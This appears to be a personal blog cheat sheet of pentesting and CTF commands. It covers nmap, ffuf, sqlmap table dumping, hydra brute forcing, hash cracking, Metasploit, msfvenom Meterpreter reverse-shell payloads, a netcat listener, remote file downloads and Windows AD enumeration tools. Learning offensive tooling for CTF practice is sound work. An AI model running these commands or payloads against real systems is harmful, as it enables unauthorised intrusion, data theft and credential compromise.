ToolBox
Last Update : 05/18/2022
The objective of this blog page is to gather the different tools I use on a daily basis to solve CTF. This article will evolve and be enriched as time goes by.
I recommend these blogs if you are looking to learn new things in Pentesting:
Online Tools
CyberChef
Crackstation
Hash Analyser
FotoForensics
Linux Tools
Nmap
nmap documentation
nmap script list
Basic Scan : nmap -sV -T4 -Pn [IP]
UDP Scan : sudo nmap -sU --min-rate 5000 [IP]
SMB Scan : nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse [IP]
SMB Scan bis : nmap -p445,135,139 --script="safe or smb-enum-*" [IP]
RPC Scan : nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount [IP]
FFUF
Directory scan : ffuf -c -u http://[IP]/FUZZ -w common.txt -recursion -recursion-depth 2
Subdomain scan : ffuf -c -u http://[IP] -w subdomains.txt -H "Host: FUZZ.[IP]" -fw xx
SQLmap
Injection check : sqlmap -r request.txt --batch
Database listing : sqlmap -r request.txt --dbs --batch
Table listing : sqlmap -r request.txt -D [data_base] --dump --batch
Dump table : sqlmap -r request.txt -D [data_base] -T [table] --dump --batch
request.txt : copy from burp
Hydra
SSH Brute Force : hydra -l jan -P rockyou.txt ssh://[IP]
Post Form Brute Force : hydra -f -l admin -P /usr/share/wordlists/rockyou.txt [IP] http-post-form "[Page]:VIEWSTATE + USER + PASS:Login failed"
John
SSH : ssh2john.py key.rsa > result.txt
ZIP : zip2john.py file.zip > result.txt
RAR : rar2john file.rar > result.txt
john result.txt --wordlist=rockyou.txt
Hashcat
md5 : hashcat -m 0 hash rockyou.txt
Metasploit
Nmap scan with vulns detection : db_nmap -sV [IP]
List of vulns from nmap scan : vulns
Search for module : search [text]
Use module : use [path_to_module]
List of options for the selected module : options
Set options value : set [options] [value]
Show running sessions : show sessions
Enter a session (CTRL-Z to background it) : sessions -i [id_session]
List of available payloads : show payloads
Set payload value : set PAYLOAD [payload_name]
Start module : run (or exploit)
SMB
Check anonymous access : smbclient --no-pass -L //[IP]
User/Share enumeration : enum4linux -a [IP]
Linux Command
Copy file over SSH : scp [FILE] [user]@[IP]:[folder]
Search exploit : searchsploit [NAME]
Download exploit : searchsploit -x [code] > [FILE]
SSH Port Forwarding : ssh -L [local_port]:127.0.0.1:[target_port] -N [target_user]@[target_ip]
File server : python3 -m http.server 8080
Download from file server : wget http://[IP]:8080/[file]
Open port : nc -nlvp 1234
Upgrade reverse shell : python3 -c 'import pty; pty.spawn("/bin/bash")'
List open port : netstat -lntu
Telnet with user : telnet [IP] -l [user]
Mysql with host : mysql -h [IP] -u [user] -p
Find file : find / -name [name] 2>/dev/null
List Cron Job : cat /etc/crontab
Encode Base64 : base64 <<< [string]
Decode Base64 : base64 -d <<< [string]
Decode Hexa : xxd -r -p <<< [string]
HTTP Header : curl -I [IP]
Reverse Shell
Reverse Shell Cheat Sheet
Reverse Shell Generator
Reverse Shell Kali : /usr/share/webshells
Reverse Shell Windows (.exe)
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=1234 -f exe -o shell.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=[IP] LPORT=1234 -f aspx -o shell.aspx
Windows
AD Enumeration
sudo neo4j console
bloodhound
AD Control Paths
Group3r
Snaffler
CrackMapExec
Exploit Suggester Metasploit : post/multi/recon/local_exploit_suggester
Powershell
Download a file via Powershell
powershell -c "Invoke-WebRequest -Uri 'http://[IP]/[File]' -OutFile 'c:[…]'"
Privilege Escalation
Linux : linPEAS
Windows : winPEAS
Find SUID file : find / -perm -u=s -type f 2>/dev/null
OSINT
OSINT Framework
Awesome OSINT
OSINT Techniques
Recon Tools
Advanced Googling
Exact term search : "[term]"
Exclude term : -[term]
Search within a website : site:[site] "[term]"
Search file type : filetype:[type]
Search in URL : inurl:[term]
Search in text : intext:[term]